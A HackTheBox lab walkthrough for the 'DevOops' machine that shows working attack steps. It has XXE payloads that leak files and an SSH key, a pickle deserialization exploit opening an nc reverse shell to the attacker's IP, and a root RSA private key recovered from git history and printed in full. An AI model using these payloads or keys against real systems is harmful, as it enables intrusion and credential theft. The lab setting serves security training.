HackTheBox - Walkthrough

About

Name: DevOops
IP Address: 10.10.10.91
Operating System: Linux
Difficulty: 4.3/10
Base Points: 30

Enumeration

Let's first do a NMAP scan to see what ports are open and what services are running on the target.

nmap -sC -sV 10.10.10.91
Starting Nmap 7.70 ( https://nmap.org ) at 2019-01-01 14:51 CET
Nmap scan report for 10.10.10.91
Host is up (0.037s latency).
Not shown: 998 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 42:90:e3:35:31:8d:8b:86:17:2a:fb:38:90:da:c4:95 (RSA)
|   256 b7:b6:dc:c4:4c:87:9b:75:2a:00:89:83:ed:b2:80:31 (ECDSA)
|_  256 d5:2f:19:53:b2:8e:3a:4b:b3:dd:3c:1f:c0:37:0d:00 (ED25519)
5000/tcp open  http    Gunicorn 19.7.1
|_http-server-header: gunicorn/19.7.1
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

We see that port 5000/tcp is open and running Gunicorn.
Gunicorn is a Python WSGI HTTP Server, and visiting the website we are presented with the following page:

There's not much we can do on this page, so I decided to run GoBuster to try and find other directories.

gobuster -w /usr/share/wordlists/dirb/directory-list-2.3-medium.txt -u http://10.10.10.91:5000

=====================================================
Gobuster v2.0.0              OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://10.10.10.91:5000/
[+] Threads      : 10
[+] Wordlist     : /usr/share/wordlists/dirb/directory-list-2.3-medium.txt
[+] Status codes : 200,204,301,302,307,403
[+] Timeout      : 10s
=====================================================
2019/01/01 15:20:28 Starting gobuster
=====================================================
/feed (Status: 200)
/upload (Status: 200)

/upload seems like an interesting start, and upon visiting this directory we're presented with a form for uploading XML files - XXE attack (External XML Entity) anyone?

So after trying a couple of differently structured XML documents I struck gold and was able to dump /etc/passwd using the following XML document:

<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY foobar SYSTEM "file:///etc/passwd" >
]
>
<post>
    <Author></Author>
    <Subject></Subject>
    <Content>&foobar;</Content>
</post>

Output from the web page after uploading the XML document:

Looking at the ouput of /etc/passwd we can see a user called roosa. Let's see if we can use this user to get an initial foothold.

Initial Foothold

So, there's two ways to get an initial foothold. One unintended way and one intended way.
I will show both methods starting with the unintended way.

Unintended way

The first time I did this box I got my initial foothold using the unintended way where you use the XXE attack to leak roosa's private key and SSH into the box.

Modifying our XML document we can leak the private key:

<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY foobar SYSTEM "file:///home/rosa/.ssh/id_rsa" >
]
>
<post>
    <Author></Author>
    <Subject></Subject>
    <Content>&foobar;</Content>
</post>

After uploading this XML document we're able to leak the private key.

And we are able to SSH in as roosa:

ssh -i id_rsa roosa@10.10.10.91
Welcome to Ubuntu 16.04.4 LTS (GNU/Linux 4.13.0-37-generic i686)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

135 packages can be updated.
60 updates are security updates.

Last login: Mon Dec 31 13:36:39 2018 from 10.10.14.20

Intended way

The intended way was to leak the source code for feed.py and see that they are using the pickle module.
Pickle is NOT intended to be used with untrusted input since this may lead to RCE, as we will see now.

We see the following path after uploading a XML document: /home/roosa/deploy/src/feed.py
We can use it to leak the python source code.

First we need to modify the XML document:

<?xml version="1.0"?>           
 <!DOCTYPE foo [                 
 <!ELEMENT foo ANY >                
 <!ENTITY foobar SYSTEM "file:///home/roosa/deploy/src/feed.py" >
 ]                               
 >                              
 <post>                       
     <Author></Author>                          
     <Subject></Subject>                    
     <Content>&foobar;</Content>                           
 </post>

After we upload the new XML document we are able to leak the python source code:

Python code cleaned up:

def uploaded_file(filename): 
    return send_from_directory(Config.UPLOAD_FOLDER, filename) 

@app.route("/") 
def xss(): 
    return template('index.html') 

@app.route("/feed") 
def fakefeed(): 
    return send_from_directory(".","devsolita-snapshot.png") 

@app.route("/newpost", methods=["POST"]) 
def newpost(): # TODO: proper save to database, this is for testing purposes right now 
    picklestr = base64.urlsafe_b64decode(request.data) 
    # return picklestr 
    postObj = pickle.loads(picklestr) 
    return "POST RECEIVED: " + postObj['Subject'] 
## TODO: VERY important! DISABLED THIS IN PRODUCTION 
#app = DebuggedApplication(app, evalex=True, console_path='/debugconsole') 
# TODO: Replace run-gunicorn.sh with real Linux service script 
#app = DebuggedApplication(app, evalex=True, console_path='/debugconsole') 
if __name__ == "__main__": 
    app.run(host='0.0.0,0', Debug=True)

Looking at the source code we can see that the web application expects a base64 encoded string.
It then loads the data using pickle.loads(picklestr) and returns the Subject item from the object.

When I'm testing for RCE I usually try to get the target to ping me. This way I can easily detect if my attack is working.
So after a bit of trial and error I ended up with the following code to generate the correct data and get the server to ping me:

import base64
import pickle

cmd_to_execute = 'ping -c 1 10.10.14.17'

class FooClass(object):
    def __reduce__(self):
        import os
        return (os.system,(cmd_to_execute,))

print(base64.urlsafe_b64encode(pickle.dumps(FooClass())))

Using curl to send the base64 encoded data as a POST request resulting in an ICMP packet reaching my host.

curl -H "Content-Type: text/plain" -X POST -d "Y3Bvc2l4CnN5c3RlbQpwMAooUydwaW5nIC1jIDEgMTAuMTAuMTQuMTcnCnAxCnRwMgpScDMKLg==" http://10.10.10.91:5000/newpost

tcpdump -nni tun0 icmp
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on tun0, link-type RAW (Raw IP), capture size 262144 bytes
17:30:15.957138 IP 10.10.10.91 > 10.10.14.17: ICMP echo request, id 4590, seq 1, length 64
17:30:15.957160 IP 10.10.14.17 > 10.10.10.91: ICMP echo reply, id 4590, seq 1, length 64

So now that we know we have RCE on the server, let's modify the code to give us a reverse shell.

import base64
import pickle

cmd_to_execute = 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.17 443 >/tmp/f'

class FooClass(object):
    def __reduce__(self):
        import os
        return (os.system,(cmd_to_execute,))

print(base64.urlsafe_b64encode(pickle.dumps(FooClass())))

Send the POST request again with the newly created base64 encoded data, and remember to setup at netcat listener on port 443.

nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.17] from (UNKNOWN) [10.10.10.91] 59576
/bin/sh: 0: can't access tty; job control turned off

And we can now cat user.txt.

cat user.txt
c5808e...ecc67b

Privilege Escalation

After a bit of enumeration I found a work directory containing the blogfeed application. This directory also contains a .git directory which is always interesting.

Running git log reveals a couple of interesting commits.

git log
[...]
commit 33e87c312c08735a02fa9c796021a4a3023129ad
Author: Roosa Hakkerson 
Date:   Mon Mar 19 09:33:06 2018 -0400

    reverted accidental commit with proper key

commit d387abf63e05c9628a59195cec9311751bdb283f
Author: Roosa Hakkerson 
Date:   Mon Mar 19 09:32:03 2018 -0400

    add key for feed integration from tnerprise backend
[...]

So they accidentely commited the wrong key... Maybe this is a private key?
Let's take a look at the git log and see if we can find something interesting.

After scrolling through the log I found the following commit:

git log -p
+++ b/resources/integration/authcredentials.key
@@ -1,28 +1,27 @@
 -----BEGIN RSA PRIVATE KEY-----        
-MIIEogIBAAKCAQEArDvzJ0k7T856dw2pnIrStl0GwoU/WFI+OPQcpOVj9DdSIEde                   
-8PDgpt/tBpY7a/xt3sP5rD7JEuvnpWRLteqKZ8hlCvt+4oP7DqWXoo/hfaUUyU5i                   
-vr+5Ui0nD+YBKyYuiN+4CB8jSQvwOG+LlA3IGAzVf56J0WP9FILH/NwYW2iovTRK     
-nz1y2vdO3ug94XX8y0bbMR9Mtpj292wNrxmUSQ5glioqrSrwFfevWt/rEgIVmrb+                   
-CCjeERnxMwaZNFP0SYoiC5HweyXD6ZLgFO4uOVuImILGJyyQJ8u5BI2mc/SHSE0c      
-F9DmYwbVqRcurk3yAS+jEbXgObupXkDHgIoMCwIDAQABAoIBAFaUuHIKVT+UK2oH
-uzjPbIdyEkDc3PAYP+E/jdqy2eFdofJKDocOf9BDhxKlmO968PxoBe25jjjt0AAL                   
-gCfN5I+xZGH19V4HPMCrK6PzskYII3/i4K7FEHMn8ZgDZpj7U69Iz2l9xa4lyzeD                   
-k2X0256DbRv/ZYaWPhX+fGw3dCMWkRs6MoBNVS4wAMmOCiFl3hzHlgIemLMm6QSy                   
-NnTtLPXwkS84KMfZGbnolAiZbHAqhe5cRfV2CVw2U8GaIS3fqV3ioD0qqQjIIPNM                   
-HSRik2J/7Y7OuBRQN+auzFKV7QeLFeROJsLhLaPhstY5QQReQr9oIuTAs9c+oCLa                   
-2fXe3kkCgYEA367aoOTisun9UJ7ObgNZTDPeaXajhWrZbxlSsOeOBp5CK/oLc0RB                   
-GLEKU6HtUuKFvlXdJ22S4/rQb0RiDcU/wOiDzmlCTQJrnLgqzBwNXp+MH6Av9WHG                   
-jwrjv/loHYF0vXUHHRVJmcXzsftZk2aJ29TXud5UMqHovyieb3mZ0pcCgYEAxR41                   
-IMq2dif3laGnQuYrjQVNFfvwDt1JD1mKNG8OppwTgcPbFO+R3+MqL7lvAhHjWKMw                   
-+XjmkQEZbnmwf1fKuIHW9uD9KxxHqgucNv9ySuMtVPp/QYtjn/ltojR16JNTKqiW                   
-7vSqlsZnT9jR2syvuhhVz4Ei9yA/VYZG2uiCpK0CgYA/UOhz+LYu/MsGoh0+yNXj                   
-Gx+O7NU2s9sedqWQi8sJFo0Wk63gD+b5TUvmBoT+HD7NdNKoEX0t6VZM2KeEzFvS                   
-iD6fE+5/i/rYHs2Gfz5NlY39ecN5ixbAcM2tDrUo/PcFlfXQhrERxRXJQKPHdJP7                   
-VRFHfKaKuof+bEoEtgATuwKBgC3Ce3bnWEBJuvIjmt6u7EFKj8CgwfPRbxp/INRX                   
-S8Flzil7vCo6C1U8ORjnJVwHpw12pPHlHTFgXfUFjvGhAdCfY7XgOSV+5SwWkec6                   
-md/EqUtm84/VugTzNH5JS234dYAbrx498jQaTvV8UgtHJSxAZftL8UAJXmqOR3ie                   
-LWXpAoGADMbq4aFzQuUPldxr3thx0KRz9LJUJfrpADAUbxo8zVvbwt4gM2vsXwcz                   
-oAvexd1JRMkbC7YOgrzZ9iOxHP+mg/LLENmHimcyKCqaY3XzqXqk9lOhA3ymOcLw                   
-LS4O7JPRqVmgZzUUnDiAVuUHWuHGGXpWpz9EGau6dIbQaUUSOEE=                               
+MIIEpQIBAAKCAQEApc7idlMQHM4QDf2d8MFjIW40UickQx/cvxPZX0XunSLD8veN                   
+ouroJLw0Qtfh+dS6y+rbHnj4+HySF1HCAWs53MYS7m67bCZh9Bj21+E4fz/uwDSE                   
+23g18kmkjmzWQ2AjDeC0EyWH3k4iRnABruBHs8+fssjW5sSxze74d7Ez3uOI9zPE                   
+sQ26ynmLutnd/MpyxFjCigP02McCBrNLaclcbEgBgEn9v+KBtUkfgMgt5CNLfV8s
+ukQs4gdHPeSj7kDpgHkRyCt+YAqvs3XkrgMDh3qI9tCPfs8jHUvuRHyGdMnqzI16
+ZBlx4UG0bdxtoE8DLjfoJuWGfCF/dTAFLHK3mwIDAQABAoIBADelrnV9vRudwN+h
+LZ++l7GBlge4YUAx8lkipUKHauTL5S2nDZ8O7ahejb+dSpcZYTPM94tLmGt1C2bO
+JqlpPjstMu9YtIhAfYF522ZqjRaP82YIekpaFujg9FxkhKiKHFms/2KppubiHDi9
+oKL7XLUpSnSrWQyMGQx/Vl59V2ZHNsBxptZ+qQYavc7bGP3h4HoRurrPiVlmPwXM
+xL8NWx4knCZEC+YId8cAqyJ2EC4RoAr7tQ3xb46jC24Gc/YFkI9b7WCKpFgiszhw
+vFvkYQDuIvzsIyunqe3YR0v8TKEfWKtm8T9iyb2yXTa+b/U3I9We1P+0nbfjYX8x
+6umhQuECgYEA0fvp8m2KKJkkigDCsaCpP5dWPijukHV+CLBldcmrvUxRTIa8o4e+
+OWOMW1JPEtDTj7kDpikekvHBPACBd5fYnqYnxPv+6pfyh3H5SuLhu9PPA36MjRyE
+4+tDgPvXsfQqAKLF3crG9yKVUqw2G8FFo7dqLp3cDxCs5sk6Gq/lAesCgYEAyiS0
+937GI+GDtBZ4bjylz4L5IHO55WI7CYPKrgUeKqi8ovKLDsBEboBbqRWcHr182E94
+SQMoKu++K1nbly2YS+mv4bOanSFdc6bT/SAHKdImo8buqM0IhrYTNvArN/Puv4VT
+Nszh8L9BDEc/DOQQQzsKiwIHab/rKJHZeA6cBRECgYEAgLg6CwAXBxgJjAc3Uge4
+eGDe3y/cPfWoEs9/AptjiaD03UJi9KPLegaKDZkBG/mjFqFFmV/vfAhyecOdmaAd
+i/Mywc/vzgLjCyBUvxEhazBF4FB8/CuVUtnvAWxgJpgT/1vIi1M4cFpkys8CRDVP
+6TIQBw+BzEJemwKTebSFX40CgYEAtZt61iwYWV4fFCln8yobka5KoeQ2rCWvgqHb
+8rH4Yz0LlJ2xXwRPtrMtJmCazWdSBYiIOZhTexe+03W8ejrla7Y8ZNsWWnsCWYgV
+RoGCzgjW3Cc6fX8PXO+xnZbyTSejZH+kvkQd7Uv2ZdCQjcVL8wrVMwQUouZgoCdA
+qML/WvECgYEAyNoevgP+tJqDtrxGmLK2hwuoY11ZIgxHUj9YkikwuZQOmFk3EffI
+T3Sd/6nWVzi1FO16KjhRGrqwb6BCDxeyxG508hHzikoWyMN0AA2st8a8YS6jiOog
+bU34EzQLp7oRU/TKO6Mx5ibQxkZPIHfgA1+Qsu27yIwlprQ64+oeEr0=
 -----END RSA PRIVATE KEY-----

Cleaning up the private key we end up with the following:

Okay, so we have recovered a private key. Let's try this as the root user.

ssh -i root.key root@10.10.10.91
Welcome to Ubuntu 16.04.4 LTS (GNU/Linux 4.13.0-37-generic i686)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

135 packages can be updated.
60 updates are security updates.

Last login: Mon Dec 31 14:23:16 2018 from 10.10.14.20

It worked!
Now we just need to cat root.txt and we're finished with this box.

cat root.txt
d4fe1e7f7187407eebdd3209cb1ac7b3

Hack The Box: DevOops